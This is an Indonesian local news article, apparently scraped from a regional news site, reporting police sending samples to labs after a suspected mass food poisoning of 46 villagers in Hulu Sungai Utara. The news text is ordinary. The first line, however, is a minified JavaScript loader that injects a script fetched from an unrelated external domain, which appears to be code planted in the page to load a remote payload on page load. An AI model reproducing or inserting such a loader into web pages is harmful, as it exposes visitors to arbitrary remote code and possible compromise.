(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Dugaan Keracunan Massal, Polres HSU Kirim Sampel ke BBTKLPP Banjarbaru


KANALKALIMANTAN.COM, AMUNTAI – Menyusul dugaan kasus keracunan massal yang menimpa puluhan warga di Desa Padang Tanggul, Kecamatan Amuntai Selatan, Kabupaten Hulu Sungai Utara (HSU), setelah menyantap sajian nasi bungkus hajatan, Senin(6/11/2023) lalu. Polres HSU masih mendalami kasus tersebut, kekinian sampel berupa bumbu yang diduga menjadi pemicu keracunan dibawa ke laboratorium untuk pemeriksaan lebih lanjut.

“Hari ini kami telah membawa sampel berupa bumbu yang diduga menjadi pemicu keracunan kami serahkan ke BPOM Banjarmasin dan instalasi pelayanan teknik BBTKLPP (Balai Besar Teknik Kesehatan Lingkungan dan Pengendalian Penyakit ) Banjarbaru,” beber Kapolres HSU melalui Kasi Humas AKP Momo Jon Rodok, Selasa (7/11/2023) siang.

“Selain itu, kami juga berharap hasil pemeriksaan sampel di laboratorium akan memberikan petunjuk yang lebih konkret,” tambahnya.

Baca juga: Dua Kota di Kalsel Tertinggi Kasus Kekerasan Perempuan dan Anak

Hingga saat ini, polisi belum dapat memastikan apakah keracunan massal ini disebabkan oleh bahan makanan yang terkontaminasi atau faktor lain yang masih dalam penyelidikan.

Namun, pihaknya berkomitmen untuk mengusut tuntas penyebab kasus ini demi melindungi masyarakat dari bahaya serupa di masa depan.

Perkembangan kasus ini akan terus diungkap oleh Polres HSU guna memberikan kejelasan kepada masyarakat.

Baca juga: Dua Kali Sebut Golkar, Video Kadisdikbud Kalsel di YouTube Menghilang

Dalam situasi ini, Polres HSU juga mengimbau kepada masyarakat untuk lebih berhati-hati dan teliti dalam memilih dan mengonsumsi makanan.

“Jika menemukan sesuatu yang mencurigakan atau mengalami gejala keracunan setelah makan, segera hubungi pihak berwenang terdekat untuk tindakan lebih lanjut,” imbuhnya.

Total 46 warga Desa Padang Tanggul diduga mengalami keracunan massal usai menyantap sajian nasi bungkus hajatan salah satu warga. Dengan gejala muntah, diare, dan panas badan. Akibatnya, mereka harus mendapatkan perawatan di Puskesmas Amuntai Selatan dan sebagiannya dirujuk ke RSUD Pembalah Batung Amuntai.

Baca juga: Kafilah Kalsel Peringkat 5 STQH Nasional XXVII di Jambi

Terpisah, Kasubag Hukum, Humas dan Organisasi RSUD Pambalah Batung Amuntai, Muhammad Yusuf membenarkan adanya sejumlah pasien yang harus mendapatkan perawatan dan masuk ke IGD karena diduga keracunan makanan.

Saat ditanyakan berapa korban yang masih dirawat di RSUD Pembalah Batung Amuntai, ia menyebut ada empat orang. “Di ruang aster satu, melati satu, anak dua,” sebutnya. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Muhammad Andi

Recent Posts

280 Jemaah Haji HSU Dilepas Menuju Asrama Haji

KANALKALIMANTAN.COM, AMUNTAI - Lambaian tangan menyertai keberangkatan 280 jemaah haji Kabupaten Hulu Sungai Utara (HSU)… Read More

21 menit ago

Selewengkan Dana Hibah Kubah, Warga Lampihong Dituntut 15 Bulan Penjara

KANALKALIMANTAN.COM, BANJARMASIN - Jaksa Penuntut Umum (JPU) Kejaksaan Negeri (Kejari) Balangan menyatakan Arbainsyah, terdakwa kasus… Read More

31 menit ago

Garuda Semrawut, Kemenag Geram Penerbangan Haji Delay 17 Jam

KANALKALIMANTAN.COM, JAKARTA - Kementerian Agama (Kemenag) geram dengan cara yang diambil manajemen Garuda Indonesia terkait… Read More

1 jam ago

Temu Kangen Reuni Akbar Alumni SMPN 1 dan SMAN 1 Mandomai

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi hadiri temu kangen reuni akbar… Read More

2 jam ago

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

15 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

17 jam ago

This website uses cookies.